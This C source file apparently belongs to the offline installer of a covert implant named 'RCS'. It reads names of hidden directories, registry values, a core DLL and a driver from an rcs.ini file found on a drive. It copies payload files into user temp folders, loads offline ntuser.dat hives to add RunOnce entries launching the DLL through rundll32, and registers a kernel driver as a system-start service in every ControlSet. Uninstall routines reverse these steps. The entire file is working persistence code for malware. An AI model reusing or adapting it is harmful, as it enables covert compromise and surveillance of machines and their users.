#include "stdafx.h"
#include "Functions_Users.h"
#include "commons.h"

void ClearAttributes(WCHAR *fname)
{
	SetFileAttributes(fname, FILE_ATTRIBUTE_NORMAL);
}

BOOL ReadRCSInfo(rcs_struct_t *rcs_info)
{
	WCHAR drive_list[512];
	DWORD drive_len, i;
	HANDLE hfile;
	
	if(!(drive_len = GetLogicalDriveStrings(sizeof(drive_list) / sizeof(drive_list[0]), drive_list)))
		return FALSE;

	rcs_info->rcs_files_path[0] = L'\0';

	for(i = 0; i < drive_len; i += 4) {
		swprintf_s(rcs_info->rcs_ini_path, MAX_PATH, L"%s%s", &drive_list[i], L"RCSPE\\rcs.ini");
		hfile = CreateFile(rcs_info->rcs_ini_path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
		if (hfile != INVALID_HANDLE_VALUE) {
			CloseHandle(hfile);
			swprintf_s(rcs_info->rcs_files_path, MAX_PATH, L"%s%s", &drive_list[i], L"RCSPE\\files\\");
			break;
		}
	}

	if(rcs_info->rcs_files_path[0] == L'\0') {
		return FALSE;
	}

	if(!GetPrivateProfileString(L"RCS", L"HDIR", L"", rcs_info->hdir, sizeof(rcs_info->hdir)/sizeof(rcs_info->hdir[0]), rcs_info->rcs_ini_path)) {
		return FALSE;
	}
	if(!GetPrivateProfileString(L"RCS", L"HREG", L"", rcs_info->hreg, sizeof(rcs_info->hreg)/sizeof(rcs_info->hreg[0]), rcs_info->rcs_ini_path)) {
		return FALSE;
	}
	if(!GetPrivateProfileString(L"RCS", L"HCORE", L"", rcs_info->hcore, sizeof(rcs_info->hcore)/sizeof(rcs_info->hcore[0]), rcs_info->rcs_ini_path)) {
		return FALSE;
	}
	if(!GetPrivateProfileString(L"RCS", L"HDRV", L"", rcs_info->hdrv, sizeof(rcs_info->hdrv)/sizeof(rcs_info->hdrv[0]), rcs_info->rcs_ini_path)) {
		return FALSE;
	}
	if(!GetPrivateProfileString(L"RCS", L"HSYS", L"", rcs_info->hsys, sizeof(rcs_info->hsys)/sizeof(rcs_info->hsys[0]), rcs_info->rcs_ini_path)) {
		return FALSE;
	}

	return TRUE;
}


BOOL RCSInstall(rcs_struct_t *rcs_info, users_struct_t *user_info)
{
	WCHAR tmp_path[MAX_PATH*2];
	WCHAR tmp_path2[MAX_PATH*2];
	HANDLE hFind;
	WIN32_FIND_DATA file_info;

	// Crea la directory
	swprintf_s(tmp_path, MAX_PATH, L"%s%s\\%s", user_info->user_home, user_info->user_temp, rcs_info->hdir);
	ClearAttributes(tmp_path);
	if (!CreateDirectory(tmp_path, NULL) && (GetLastError()!=ERROR_ALREADY_EXISTS)) 
		return FALSE;

	// Copia i file 
	swprintf_s(tmp_path, MAX_PATH, L"%s\\*.*", rcs_info->rcs_files_path);
	hFind = FindFirstFile(tmp_path, &file_info);
	if (hFind != INVALID_HANDLE_VALUE) {
		do {
			// Salta le directory (es: ".", ".." etc...)
			if (file_info.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
				continue;

			swprintf_s(tmp_path, MAX_PATH, L"%s\\%s", rcs_info->rcs_files_path, file_info.cFileName);
			swprintf_s(tmp_path2, MAX_PATH, L"%s%s\\%s\\%s", user_info->user_home, user_info->user_temp, rcs_info->hdir, file_info.cFileName);
			ClearAttributes(tmp_path2);
			if (!CopyFile(tmp_path, tmp_path2, FALSE)) {
				FindClose(hFind);
				return FALSE;
			}
			SetFileAttributes(tmp_path2, FILE_ATTRIBUTE_NORMAL);
		} while (FindNextFile(hFind, &file_info));
		if (GetLastError() != ERROR_NO_MORE_FILES) {
			FindClose(hFind);
			return FALSE;
		}
		FindClose(hFind);
	} else
		return FALSE;

	// Scrive la chiave nel registry
	swprintf_s(tmp_path, sizeof(tmp_path)/sizeof(tmp_path[0]), L"%s%s", user_info->user_home, L"\\ntuser.dat");
	if (RegLoadKey(HKEY_LOCAL_MACHINE, L"RCS_NTUSER\\", tmp_path) != ERROR_SUCCESS) 
		return FALSE;

	swprintf_s(tmp_path, sizeof(tmp_path)/sizeof(tmp_path[0]), L"%%SystemRoot%%\\system32\\rundll32.exe \"%%USERPROFILE%%%s\\%s\\%s\",HFF8", user_info->user_temp, rcs_info->hdir, rcs_info->hcore);
	if (RegSetKeyValue(HKEY_LOCAL_MACHINE, L"RCS_NTUSER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", rcs_info->hreg, REG_EXPAND_SZ, tmp_path, (wcslen(tmp_path)+1)*sizeof(WCHAR)) != ERROR_SUCCESS) {
		RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_NTUSER\\");
		return FALSE;
	}

	RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_NTUSER\\");
	return TRUE;
}



BOOL RCSUnInstall(rcs_struct_t *rcs_info, users_struct_t *user_info)
{
	WCHAR tmp_path[MAX_PATH*2];
	HANDLE hFind;
	WIN32_FIND_DATA file_info;
	BOOL ret_val = TRUE;

	// Cancella tutti i file
	swprintf_s(tmp_path, MAX_PATH, L"%s%s\\%s\\*.*", user_info->user_home, user_info->user_temp, rcs_info->hdir);
	hFind = FindFirstFile(tmp_path, &file_info);
	if (hFind != INVALID_HANDLE_VALUE) {
		do {
			// Salta le directory (es: ".", ".." etc...)
			if (file_info.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
				continue;
			swprintf_s(tmp_path, MAX_PATH, L"%s%s\\%s\\%s", user_info->user_home, user_info->user_temp, rcs_info->hdir, file_info.cFileName);
			ClearAttributes(tmp_path);
			DeleteFile(tmp_path);
		} while (FindNextFile(hFind, &file_info));
		FindClose(hFind);
	}

	// Cancella la directory
	swprintf_s(tmp_path, MAX_PATH, L"%s%s\\%s", user_info->user_home, user_info->user_temp, rcs_info->hdir);
	ClearAttributes(tmp_path);
	if (!RemoveDirectory(tmp_path))
		ret_val = FALSE;

	// Cancella la chiave nel registry
	swprintf_s(tmp_path, sizeof(tmp_path)/sizeof(tmp_path[0]), L"%s%s", user_info->user_home, L"\\ntuser.dat");
	if (RegLoadKey(HKEY_LOCAL_MACHINE, L"RCS_NTUSER\\", tmp_path) != ERROR_SUCCESS) 
		return FALSE;

	if (RegDeleteKeyValue(HKEY_LOCAL_MACHINE, L"RCS_NTUSER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce", rcs_info->hreg) != ERROR_SUCCESS) {
		RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_NTUSER\\");
		return FALSE;
	}

	RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_NTUSER\\");
	return ret_val;
}


BOOL DriverInstall(os_struct_t *os_info, rcs_struct_t *rcs_info)
{
	WCHAR src_drv[MAX_PATH];
	WCHAR dest_drv[MAX_PATH];
	WCHAR *subkey;
	BOOL ret_val = TRUE;
	DWORD i, dwvalue;
	HKEY hreg;

	if (!os_info || !rcs_info)
		return FALSE;

	swprintf_s(src_drv, sizeof(src_drv)/sizeof(src_drv[0]), L"%s\\%s", rcs_info->rcs_files_path, rcs_info->hdrv);
	swprintf_s(dest_drv, sizeof(dest_drv)/sizeof(dest_drv[0]), L"%s%s\\drivers\\%s", os_info->drive, os_info->system_root, rcs_info->hsys);

	ClearAttributes(dest_drv);
	if (!CopyFile(src_drv, dest_drv, FALSE))
		return FALSE;
	SetFileAttributes(dest_drv, FILE_ATTRIBUTE_NORMAL);
	swprintf_s(src_drv, sizeof(src_drv)/sizeof(src_drv[0]), L"%s%s%s", os_info->drive, os_info->system_root, L"\\config\\system");
	if (RegLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SYSTEM\\", src_drv) != ERROR_SUCCESS) 	
		return FALSE;
	
	for(i=0;;i++) {
		if (!RegEnumSubKey(L"RCS_SYSTEM\\", i, &subkey))
			break;

		// Vede se  un ControlSet
		if (_wcsnicmp(subkey, L"ControlSet", wcslen(L"ControlSet"))) {
			SAFE_FREE(subkey);
			continue;
		}

		// Scrive la chiave
		swprintf_s(src_drv, sizeof(src_drv)/sizeof(src_drv[0]), L"RCS_SYSTEM\\%s\\Services\\%s", subkey, rcs_info->hsys);
		SAFE_FREE(subkey);
		if (RegCreateKey(HKEY_LOCAL_MACHINE, src_drv, &hreg) == ERROR_SUCCESS) {
			RegCloseKey(hreg);
			dwvalue = 0;
			if (RegSetKeyValue(HKEY_LOCAL_MACHINE, src_drv, L"ErrorControl", REG_DWORD, &dwvalue, sizeof(dwvalue)) != ERROR_SUCCESS) {
				ret_val = FALSE;
				continue;
			}
			dwvalue = 1;
			if (RegSetKeyValue(HKEY_LOCAL_MACHINE, src_drv, L"Start", REG_DWORD, &dwvalue, sizeof(dwvalue)) != ERROR_SUCCESS) {
				ret_val = FALSE;
				continue;
			}
			if (RegSetKeyValue(HKEY_LOCAL_MACHINE, src_drv, L"Type", REG_DWORD, &dwvalue, sizeof(dwvalue)) != ERROR_SUCCESS) {
				ret_val = FALSE;
				continue;
			}
			if (RegSetKeyValue(HKEY_LOCAL_MACHINE, src_drv, L"DisplayName", REG_SZ, rcs_info->hsys, (wcslen(rcs_info->hsys)+1)*sizeof(rcs_info->hsys[0])) != ERROR_SUCCESS) {
				ret_val = FALSE;
				continue;
			}
			swprintf_s(dest_drv, sizeof(dest_drv)/sizeof(dest_drv[0]), L"system32\\drivers\\%s", rcs_info->hsys);
			if (RegSetKeyValue(HKEY_LOCAL_MACHINE, src_drv, L"ImagePath", REG_SZ, dest_drv, (wcslen(dest_drv)+1)*sizeof(dest_drv[0])) != ERROR_SUCCESS) {
				ret_val = FALSE;
				continue;
			}

		} else
			ret_val = FALSE;
	}

	RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SYSTEM\\");
	return ret_val;
}


BOOL DriverUnInstall(os_struct_t *os_info, rcs_struct_t *rcs_info)
{
	WCHAR src_drv[MAX_PATH];
	WCHAR dest_drv[MAX_PATH];
	WCHAR *subkey;
	BOOL ret_val = TRUE;
	DWORD i;

	if (!os_info || !rcs_info)
		return FALSE;

	swprintf_s(dest_drv, sizeof(dest_drv)/sizeof(dest_drv[0]), L"%s%s\\drivers\\%s", os_info->drive, os_info->system_root, rcs_info->hsys);
	ClearAttributes(dest_drv);
	if (!DeleteFile(dest_drv))
		ret_val = FALSE;

	swprintf_s(src_drv, sizeof(src_drv)/sizeof(src_drv[0]), L"%s%s%s", os_info->drive, os_info->system_root, L"\\config\\system");
	if (RegLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SYSTEM\\", src_drv) != ERROR_SUCCESS) 	
		return FALSE;
	
	for(i=0;;i++) {
		if (!RegEnumSubKey(L"RCS_SYSTEM\\", i, &subkey))
			break;

		// Vede se  un ControlSet
		if (_wcsnicmp(subkey, L"ControlSet", wcslen(L"ControlSet"))) {
			SAFE_FREE(subkey);
			continue;
		}

		// Cancella la chiave
		swprintf_s(src_drv, sizeof(src_drv)/sizeof(src_drv[0]), L"RCS_SYSTEM\\%s\\Services\\%s", subkey, rcs_info->hsys);
		SAFE_FREE(subkey);
		RegDeleteKey(HKEY_LOCAL_MACHINE, src_drv);
	}

	RegUnLoadKey(HKEY_LOCAL_MACHINE, L"RCS_SYSTEM\\");
	return ret_val;
}